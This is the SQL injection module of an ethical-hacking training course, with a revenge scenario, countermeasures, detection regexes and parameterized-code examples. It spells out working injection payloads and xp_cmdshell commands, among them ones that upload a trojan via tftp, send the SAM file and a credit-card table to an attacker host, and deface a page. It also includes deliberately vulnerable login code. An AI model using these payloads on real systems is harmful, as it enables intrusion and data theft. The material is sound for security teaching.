Ethical Hacking and Countermeasures
Version 6.1
Module XIX
SQL Injection
Scenario
Susan was an SQL programmer with a reputed firm. She ordered an expensive anniversary gift for her husband from e-shopping4u.com, which was a lesser-known online shopping portal but was offering better deals, and was promised delivery on anniversary day. She wanted to give her husband a surprise gift. She was upset on the anniversary day as the gift she ordered was not delivered.
She tried to contact the portal but in vain. After several failed attempts to contact the portal, she thought of taking revenge out of frustration.
What do you think, as an SQL programmer, Susan can do?
EC-Council
Copyright by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News
Source: http://www.scmagazineus.com/
Module Objective
This module will familiarize you with:
SQL Injection
Steps for performing SQL Injection
SQL Injection Techniques
SQL Injection in Oracle
SQL Injection in MySql
Attacking SQL servers
Automated Tools for SQL Injection
Countermeasures
Module Flow
SQL Injection
Steps for performing SQL Injection
SQL Injection Techniques
SQL Injection in Oracle
SQL Injection in MySql
Attacking SQL servers
Automated Tools for SQL Injection
Countermeasures
SQL Injection: Introduction
What is SQL Injection
SQL injection is a type of security exploit in which the attacker "injects" Structured Query Language (SQL) code through a web form input box to gain access to resources, or make changes to data
It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database backend
Programmers use sequential commands with user input, making it easier for attackers to inject commands
Attackers can execute arbitrary SQL commands through the web application
Exploiting Web Applications
SQL injection exploits web applications using client-supplied SQL queries
It enables an attacker to execute unauthorized SQL commands
It also takes advantage of unsafe queries in web applications and builds dynamic SQL queries
For example, when a user logs onto a web page by using a user name and password for validation, a SQL query is used
However, the attacker can use SQL injection to send specially crafted user name and password fields that poison the original SQL query
SQL Injection Steps
What do you need?
Any web browser
Input validation attack occurs here on a website
What Should You Look For
Try to look for pages that allow a user to submit data, for example: a log in page, search page, feedback, etc.
Look for HTML pages that use POST or GET commands
If POST is used, you cannot see the parameters in the URL
Check the source code of the HTML to get information
For example, to check whether it is using POST or GET, look for the <Form>
tag in the source code:
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
What If It Doesn't Take Input
If input is not given, check for pages like ASP, JSP, CGI, or PHP
Check the URL that takes the following parameters:
Example:
http://www.xsecurity.com/index.asp?id=10
In the above example, attackers might attempt:
http://www.xsecurity.com/index.asp?id=blah or 1=1--
OLE DB Errors
The user-filled fields are enclosed by a single quotation mark ('). To test, try using (') as the user name
The following error message will be displayed when a (') is entered into a form that is vulnerable to an SQL injection attack
If you get this error, then the website is vulnerable to an SQL injection attack
Input Validation Attack
Input validation attack occurs here on a website
SQL Injection Techniques
SQL Injection techniques:
Authorization bypass: Bypassing log on forms
Using the SELECT command: Used to retrieve data from the database
Using the INSERT command: Used to add information to the database
Using SQL server stored procedures
How to Test for SQL Injection
Vulnerability
Use a single quote in the input:
blah' or 1=1--
Login: blah' or 1=1--
Password: blah' or 1=1--
http://search/index.asp?id=blah' or 1=1--
Depending on the query, try the following possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
How Does it Work
Attacker breaks into the system by injecting malformed SQL into the query
Original SQL Query:
strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "'
AND Password='" + txtPassword.Text + "'";
In the case of the user entering a valid user name of "Paul"
and a password of "password", strQry becomes:
SELECT Count(*) FROM Users WHERE UserName='Paul' AND Password='password'
But when the attacker enters ' Or 1=1 --, the query now
becomes:
SELECT Count(*) FROM Users WHERE UserName='' Or 1=1 --' AND Password=''
Because a pair of hyphens designates the beginning of a
comment in SQL, the query becomes simply:
SELECT Count(*) FROM Users WHERE UserName='' Or 1=1
BadLogin.aspx.cs
This code is vulnerable to an SQL Injection Attack
private void cmdLogin_Click(object sender, System.EventArgs e) {
    string strCnx = "server=localhost;database=northwind;uid=sa;pwd=;";
    SqlConnection cnx = new SqlConnection(strCnx);
    cnx.Open();
    // Attack occurs here: this code is susceptible to SQL injection attacks,
    // because the user-supplied text is concatenated straight into the statement.
    string strQry = "SELECT Count(*) FROM Users WHERE UserName='" +
        txtUser.Text + "' AND Password='" + txtPassword.Text + "'";
    int intRecs;
    SqlCommand cmd = new SqlCommand(strQry, cnx);
    intRecs = (int) cmd.ExecuteScalar();
    if (intRecs > 0) {
        FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
    }
    else {
        lblMsg.Text = "Login attempt failed.";
    }
    cnx.Close();
}
BadProductList.aspx.cs
This code is vulnerable to an SQL Injection Attack
private void cmdFilter_Click(object sender, System.EventArgs e) {
    dgrProducts.CurrentPageIndex = 0;
    bindDataGrid();
}
private void bindDataGrid() {
    dgrProducts.DataSource = createDataView();
    dgrProducts.DataBind();
}
private DataView createDataView() {
    string strCnx =
        "server=localhost;uid=sa;pwd=;database=northwind;";
    string strSQL = "SELECT ProductId, ProductName, " +
        "QuantityPerUnit, UnitPrice FROM Products";
    // Attack occurs here: this code is susceptible to SQL injection attacks,
    // because the filter text is concatenated into the WHERE clause.
    if (txtFilter.Text.Length > 0) {
        strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
    }
    SqlConnection cnx = new SqlConnection(strCnx);
    SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
    DataTable dtProducts = new DataTable();
    sda.Fill(dtProducts);
    return dtProducts.DefaultView;
}
Executing Operating System Commands
Use stored procedures like master..xp_cmdshell to perform remote execution
Execute any OS commands
blah;exec master..xp_cmdshell <insert OS command here> --
Ping a server
blah;exec master..xp_cmdshell ping 10.10.1.2 --
Directory listing
blah;exec master..xp_cmdshell dir c:\*.* /s > c:\directory.txt --
Create a file
blah;exec master..xp_cmdshell echo juggyboy-was-here > c:\juggyboy.txt
Executing Operating System Commands (cont'd)
Defacing a web page (assuming that write access is allowed due to misconfiguration)
blah;exec master..xp_cmdshell echo you-are-defaced > c:\inetpub\wwwroot\index.htm --
Execute applications (only non-GUI apps)
blah;exec master..xp_cmdshell cmd.exe /c appname.exe --
Upload a Trojan to the server
blah;exec master..xp_cmdshell tftp -i 10.0.0.4 GET trojan.exe c:\trojan.exe --
Download a file from the server
blah;exec master..xp_cmdshell tftp -i 10.0.0.4 put c:\winnt\repair\SAM SAM --
Getting Output of SQL Query
Use sp_makewebtask to write the output of a query into an HTML file
Example
blah;EXEC master..sp_makewebtask \\10.10.1.4\share\creditcard.html, SELECT * FROM CREDITCARD
The above command exports a table called CREDITCARD to the attacker's network share
Getting Data from the Database
Using ODBC Error Message
Using UNION keyword
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
To retrieve information from the above query, use:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Using LIKE keyword
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE %25LOGIN%25--
How to Mine all Column Names of a Table
To map out all the column names of a table, type:
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login--
To get to the next column name, use NOT IN( )
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login AND COLUMN_NAME NOT IN(login_id)--
How to Retrieve any Data
To get the login_name from the admin_login table:
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
From above, you get the login_name of the admin_user:
To get the password for login_name=yuri:
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name=yuri--
How to Update/Insert Data into Database
After gathering all of the column names of a table, it is possible to UPDATE or INSERT records into it:
Example to change the password for yuri:
http://xsecurity.com/index.asp?id=10; UPDATE admin_login SET password = newboy5 WHERE login_name=yuri--
To INSERT a record:
http://xsecurity.com/index.asp?id=10; INSERT INTO admin_login(login_id,login_name,password,details) VALUES(111,yuri2,newboy5,NA)--
SQL Injection in Oracle
SQL Injection in Oracle can be
performed as follows:
UNIONS can be added to the existing statement to execute a
second statement
SUBSELECTS can be added to the existing statements
Data Definition Language (DDL) can be injected if DDL is used in
a dynamic SQL string
INSERTS, UPDATES, and DELETES can also be injected
Anonymous PL/SQL block in procedures
SQL Injection in MySql Database
It is not easy to perform SQL injection in a MySql database
While coding with a MySql application, the injection vulnerability is not exploited
It is difficult to trace the output
You can see an error because the value retrieved is passed on to multiple
queries with different numbers of columns before the script ends
In such situations, SELECT and UNION commands cannot be used
SQL Injection in MySql Database (cont'd)
For example, consider a database pizza:
http://www.xsecurity.com/pizza/index.php?a=post&s=reply&t=1'
To show the tables, type the query:
mysql> SHOW TABLES;
To see the current user:
mysql> SELECT USER();
The following query shows the first byte of Admin's Hash:
mysql> SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
The following query shows the first byte of Admin's Hash as an ASCII number:
mysql> SELECT ASCII('5');
SQL Injection in MySql Database (cont'd)
Preparing the GET Request
To inject SQL commands successfully, the request should be cleaned of any single quotes
mysql> Select active_id FROM mb_active UNION SELECT
IF(SUBSTRING(user_password,1, 1) = CHAR(53), BENCHMARK(1000000,
MD5(CHAR(1))), null) FROM mb_users WHERE user_group = 1;
Exploiting the Vulnerability
First, log in as a registered user with the rights to reply to the current thread
http://127.0.0.1/pizza/index.php?a=post&s=reply&t=1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(53), BENCHMARK(1000000, MD5(CHAR(1))), null), null, null, null, null FROM mb_users WHERE user_group = 1/*
You will see a slowdown because the first byte is CHAR(53), '5'
Attack Against SQL Servers
Techniques Involved:
Understand SQL Server and extract the necessary
information from the SQL Server Resolution Service
List of servers by Osql-L probes
Sc.exe sweeping of services
Port scanning
Use of commercial alternatives
SQL Server Resolution Service (SSRS)
The SSRS service is responsible for sending a response packet containing the connection details to clients who send a specially formed request
The packet contains the details necessary to connect to the desired instance, including the TCP port
The SSRS has buffer overflow vulnerabilities that allow remote attackers to overwrite portions of the system's memory and execute arbitrary code
Osql -L Probing
Osql is a command-line utility provided by Microsoft with SQL Server 2000 that allows the user to issue queries to the server
Osql.exe includes a discovery switch (-L) that will poll the network looking for other installations of SQL Server
It returns a list of server names and instances, but without details about TCP ports or netlibs
SQL Injection Tools
SQL Injection Automated Tools
SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
AppDetective
Database Scanner
SQLPoke
NGSSQLCrack
NGSSQuirreL
SQLPing v2.2
Hacking Tool: SQLDict
SQLdict is a dictionary attack tool for SQL Server
It tests if the accounts are strong enough to resist an attack
Source: http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl
Hacking Tool: SQLExec
This tool executes commands on compromised Microsoft SQL Servers by using the xp_cmdshell stored procedure
It uses a default sa account with a NULL password
USAGE: SQLExec www.target.com
Source: http://phoenix.liu.edu/
SQL Server Password Auditing Tool: sqlbf
The sqlbf tool is used to audit the strength of Microsoft SQL Server passwords offline
The tool can be used either in Brute-Force mode or in Dictionary attack mode
The performance on a 1 GHz Pentium (256 MB) machine is about 750,000 guesses/sec
To be able to perform an audit, the password hashes that are stored in the sysxlogins table
in the master database are needed
The hashes are easy to retrieve, although a privileged account is needed. The query to use
would be:
select name, password from master..sysxlogins
To perform a dictionary attack on the retrieved hashes:
sqlbf -u hashes.txt -d dictionary.dic -r out.rep
Hacking Tool: SQLSmack
SQLSmack is a Linux-based remote command execution tool for MSSQL
When provided with a valid user name and password, the tool permits the
execution of commands on a remote MS SQL Server, by piping them through
the stored procedure master..xp_cmdshell
Hacking Tool: SQL2.exe
SQL2 is a UDP buffer overflow remote exploit hacking tool
sqlmap
sqlmap is an automatic SQL injection tool developed in Python
It performs an extensive database management system back-end
fingerprint
Features:
Retrieves remote DBMS databases
Retrieves usernames, tables, and columns
Enumerates the entire DBMS
Reads system files
It supports two SQL injection techniques:
Blind SQL Injection
In-band SQL injection, also known as UNION query SQL Injection
sqlmap: Screenshot 1
Enumerate Database Management System Users
sqlmap: Screenshot 2
Test for SQL injection on POSTed data
sqlmap: Screenshot 3
Test for SQL Injection and DBMS back-end Detection
sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application
It performs the following:
Fingerprints the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, and DB Server authentication mode)
Bruteforces the 'sa' password
Privilege escalation to 'sa'
Creates a custom xp_cmdshell if the original one has been disabled
Uploads executables
Reverse scan in order to look for a port that can be used for a reverse shell
Direct and reverse shell, both TCP and UDP
DNS tunneled pseudoshell, when no ports are available for a bindshell
Sqlninja: Screenshot 1
Sqlninja: Screenshot 2
Sqlninja: Screenshot 3
Sqlninja: Screenshot 4
Sqlninja: Screenshot 5
Sqlninja: Screenshot 6
SQLIer
SQLIer takes a vulnerable URL and attempts to determine all necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction
It can build a UNION SELECT query designed to brute force passwords out of the database
To operate, this script does not use quotes in the exploit
An 8 character password takes approximately 1 minute to crack
SQLIer: Screenshot
Automagic SQL Injector
Automagic SQL Injector is an automated SQL injection tool designed to save time in penetration testing
It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned
Features:
Browses tables and dumps table data to a CSV file
Uploads files using the debug script method
Includes an Automagical UDP reverse shell
Has interactive xp_cmdshell (simulated cmd.exe shell)
Automagic SQL Injector: Screenshot 1
Automagic SQL Injector: Screenshot 2
Absinthe
Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection
Features:
Has automated SQL injection
Supports MS SQL Server, MSDE, Oracle, and Postgres
Has cookies / Additional HTTP Headers
Query termination
Additional text appended to queries
Supports use of proxies / proxy rotation
Has multiple filters for page profiling
Has custom delimiters
Absinthe: Screenshot
Blind SQL Injection
Blind SQL Injection
Blind SQL injection is a hacking method that allows an unauthorized attacker to access a database server
It is facilitated by a common coding blunder: the program accepts data from a client and executes SQL queries without validating the client's input
The attacker is then free to extract, modify, add, or delete content from the database
Attackers typically test for SQL injection vulnerabilities by sending application input that would cause the server to generate an invalid SQL query
Blind SQL Injection: Countermeasures
To secure an application against SQL injection, developers must never allow client-supplied data to modify the syntax of the SQL statements
The best protection is to isolate the web application from SQL
All SQL statements required by the application should be in stored procedures and kept on a database server
The application should execute stored procedures using a safe interface such as JDBC's CallableStatement or ADO's Command Object
If arbitrary statements must be used, use PreparedStatements
Both PreparedStatements and stored procedures compile the SQL statement before the user's input is added, making it impossible to modify the actual SQL statement
Blind SQL Injection: Screenshot
Blind SQL Injection Schema
SQL Injection Countermeasures
SQL Injection Countermeasures
Selection of Regular Expressions
Regular expressions for detection of SQL meta characters are:
/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix
In the above example, the regular expression would be added to the
snort rule as follows:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection - Paranoid"; flow:to_server,established; uricontent:".pl"; pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)
Since # is not an HTML meta character, it will not be encoded by the browser
SQL Injection Countermeasures (cont'd)
The modified regular expressions for detection of SQL meta characters are:
/((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/i
The regular expressions for a typical SQL injection attack are:
/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix
\w* - zero or more alphanumeric or underscore characters
(\%27)|\' - the ubiquitous single-quote or its hex equivalent
((\%6F)|o|(\%4F))((\%72)|r|(\%52)) - the word 'or' with various combinations of its upper and lower case hex equivalents
SQL Injection Countermeasures (cont'd)
The regular expressions for detecting an SQL injection attack using UNION as a keyword:
/((\%27)|(\'))union/ix
((\%27)|(\')) - the single quote and its hex equivalent
union - the keyword union
The above expression can be used for SELECT, INSERT, UPDATE, DELETE, and DROP keywords
The regular expressions for detecting SQL injection attacks on a MS SQL server:
/exec(\s|\+)+(s|x)p\w+/ix
exec - the keyword required to run the stored or extended procedure
(\s|\+)+ - one or more white spaces, or their HTTP encoded equivalents
(s|x)p - the letters sp or xp to identify stored or extended procedures, respectively
\w+ - one or more alphanumeric or underscore characters to complete the name of the procedure
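As an added example (not from the deck), the five regular expressions above translated to Python and run over a handful of constructed request lines, so a defender can see which rule fires on what. The request lines, the paths and the xsecurity.com-style host are made up for the exercise.

```python
import re

# The five Perl-style regexes from the slides, translated to Python. The /i
# flag becomes re.I; the /x flag is dropped because none of the patterns
# contain literal whitespace, so it changes nothing.
RULES = {
    "paranoid": re.compile(r"(%27)|(')|(--)|(%23)|(#)", re.I),
    "modified": re.compile(r"((%3D)|(=))[^\n]*((%27)|(')|(--)|(%3B)|(;))", re.I),
    "typical":  re.compile(r"\w*((%27)|('))((%6F)|o|(%4F))((%72)|r|(%52))", re.I),
    "union":    re.compile(r"((%27)|('))union", re.I),
    "exec":     re.compile(r"exec(\s|\+)+(s|x)p\w+", re.I),
}


def matching_rules(request_line):
    """Names (sorted) of the slide regexes that fire on one HTTP request line."""
    return sorted(name for name, rx in RULES.items() if rx.search(request_line))


def scan(request_lines):
    """Map each request line to the rules it triggers, like a log review pass."""
    return {line: matching_rules(line) for line in request_lines}


# Constructed sample request lines (not taken from the deck). They mix the
# attack shapes the slides discuss with one benign URL that contains a quote.
SAMPLE_REQUESTS = [
    "GET /index.asp?id=10 HTTP/1.1",
    "GET /index.asp?id=blah%20or%201=1-- HTTP/1.1",
    "GET /login.asp?user=admin%27or%201%3D1--&pass=x HTTP/1.1",
    "GET /index.asp?id=10%27union%20select%20top%201%20table_name"
    "%20from%20information_schema.tables-- HTTP/1.1",
    "GET /index.asp?id=1;exec+xp_cmdshell+dir HTTP/1.1",
    "GET /index.asp?id=1;exec+master..xp_cmdshell+dir HTTP/1.1",
    "GET /articles/o%27reilly.html HTTP/1.1",   # benign: only 'paranoid' fires
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(", ".join(hits) or "-", "|", line)
```

Note that the exec rule only matches when sp or xp directly follows the whitespace after exec, so the schema-qualified `master..xp_cmdshell` form used on the earlier slides is not caught as written and the pattern needs widening; the benign O'Reilly path shows why the "modified" rule (anchored on `=`) raises fewer false positives than the paranoid one.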
Preventing SQL Injection Attacks
Minimize the privileges of database connections
Disable the verbose error messages
Protect the system account sa
Audit source codes:
Escape single quotes
Input validation
Reject known bad input
Input bound checking
Preventing SQL Injection Attacks (cont'd)
Never trust the user's input
Validate all textbox entries using validation controls, regular expressions, code etc.
Never use dynamic SQL
Use parameterized SQL or stored procedures
Never connect to a database using an admin-level account
Use a limited access account to connect to the database
Do not store secrets in plain text
Encrypt or hash passwords and other sensitive data; you should also encrypt the connection strings
Exceptions should divulge minimal information
Do not reveal much information in error messages; use custom errors to display minimal information in the event of an unhandled error; set debug to false
GoodLogin.aspx.cs
private void cmdLogin_Click(object sender, System.EventArgs e) {
    string strCnx = ConfigurationSettings.AppSettings["cnxNWindBad"];
    using (SqlConnection cnx = new SqlConnection(strCnx))
    {
        SqlParameter prm;
        cnx.Open();
        // The statement text is fixed; user input only ever arrives as bound
        // parameter values, so it cannot change the SQL grammar.
        string strQry =
            "SELECT Count(*) FROM Users WHERE UserName=@username " +
            "AND Password=@password";
        int intRecs;
        SqlCommand cmd = new SqlCommand(strQry, cnx);
        cmd.CommandType = CommandType.Text;
        prm = new SqlParameter("@username", SqlDbType.VarChar, 50);
        prm.Direction = ParameterDirection.Input;
        prm.Value = txtUser.Text;
        cmd.Parameters.Add(prm);
        prm = new SqlParameter("@password", SqlDbType.VarChar, 50);
        prm.Direction = ParameterDirection.Input;
        prm.Value = txtPassword.Text;
        cmd.Parameters.Add(prm);
        intRecs = (int) cmd.ExecuteScalar();
        if (intRecs > 0) {
            FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
        }
        else {
            lblMsg.Text = "Login attempt failed.";
        }
    }
}
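The BadLogin/GoodLogin pair above reduced to the query construction alone, as an added Python example (not the deck's code) that serves the "How Does it Work" slide as well: SQLite stands in for SQL Server and a constructed one-row Users table is assumed, so the effect of the ' Or 1=1 -- input can be compared against parameterized binding. The table contents and helper names are assumptions for the exercise.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the deck's Users table (sample data)."""
    cnx = sqlite3.connect(":memory:")
    cnx.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    cnx.execute("INSERT INTO Users VALUES ('Paul', 'password')")
    return cnx


def bad_login(cnx, user, password):
    """BadLogin.aspx.cs logic: the query text is assembled by concatenation,
    so whatever the user types becomes part of the SQL grammar."""
    qry = ("SELECT Count(*) FROM Users WHERE UserName='" + user +
           "' AND Password='" + password + "'")
    return cnx.execute(qry).fetchone()[0] > 0


def good_login(cnx, user, password):
    """GoodLogin.aspx.cs logic: the statement is fixed up front and the two
    values are bound as parameters, so they are only ever compared as data."""
    qry = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return cnx.execute(qry, (user, password)).fetchone()[0] > 0


def login_raises(login_fn, cnx, user, password):
    """True if the login function throws a database error (the verbose
    'OLE DB error' of the earlier slides) instead of answering."""
    try:
        login_fn(cnx, user, password)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    inj = "' Or 1=1 --"   # the input from the 'How Does it Work' slide
    print("valid credentials  bad:", bad_login(db, "Paul", "password"),
          " good:", good_login(db, "Paul", "password"))
    print("injected username  bad:", bad_login(db, inj, ""),
          " good:", good_login(db, inj, ""))
    print("lone quote errors  bad:", login_raises(bad_login, db, "'", ""),
          " good:", login_raises(good_login, db, "'", ""))
```

With concatenation the injected username collapses the WHERE clause to `UserName='' Or 1=1` (the trailing comment hides the password check) and the count is non-zero, while a lone quote produces a syntax error; the parameterized form returns false for both and never errors.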
SQL Injection Blocking Tool: SQLBlock
http://www.sqlblock.com
SQLBlock is an ODBC/JDBC driver with a
patent pending SQL injection prevention
feature
It works as an ordinary ODBC/JDBC data source, and it monitors every SQL statement being executed
If the client application tries to execute any
un-allowed SQL statements, it blocks the
execution and sends an alert to the
administrator
SQLBlock: Screenshot
Acunetix Web Vulnerability Scanner
Acunetix Web scanner can detect and report any SQL Injection vulnerabilities
Other features include:
Cross site scripting / XSS vulnerabilities
Google hacking vulnerabilities
Source: http://www.acunetix.com
What Happened Next
Susan searched the Internet for security vulnerabilities of a portal.
By chance, she got an online forum listing SQL vulnerabilities of e-shopping4u.com. A SQL programmer herself, she crafted an SQL statement and inserted that in place of user name in their registration form. And to her surprise, she was able to bypass all input validations.
She could now access databases of e-shopping4u.com and play with thousands of their customers' records consisting of credit card and other personal information. Losses to e-shopping4u.com could be devastating.
Summary
SQL injection is an attack methodology that targets the data residing in a database
It attempts to modify the parameters of a web-based application in order to alter the SQL statements that are parsed, in order to retrieve data from the database
Database footprinting is the process of mapping the tables on the database, and is a crucial tool in the hands of an attacker
Exploits occur due to coding errors as well as inadequate validation checks
Prevention involves enforcing better coding practices and database
administration procedures